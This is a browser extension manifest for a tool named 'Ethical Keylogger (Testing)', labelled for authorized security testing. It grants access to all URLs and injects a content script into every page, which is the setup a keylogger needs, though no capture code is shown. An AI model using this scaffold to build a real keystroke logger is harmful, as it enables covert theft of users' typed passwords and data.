{
    "manifest_version": 3,
    "name": "Ethical Keylogger (Testing)",
    "version": "1.0",
    "description": "For authorized security testing only",
    "permissions": [
      "activeTab",
      "storage",
      "scripting"
    ],
    "host_permissions": [
      "http://localhost/*",
      "<all_urls>"
    ],
    "background": {
      "service_worker": "background.js"
    },
    "content_scripts": [{
      "matches": ["<all_urls>"],
      "js": ["content.js"],
      "run_at": "document_end"
    }],
    "action": {
      "default_popup": "popup.html"
    }
  }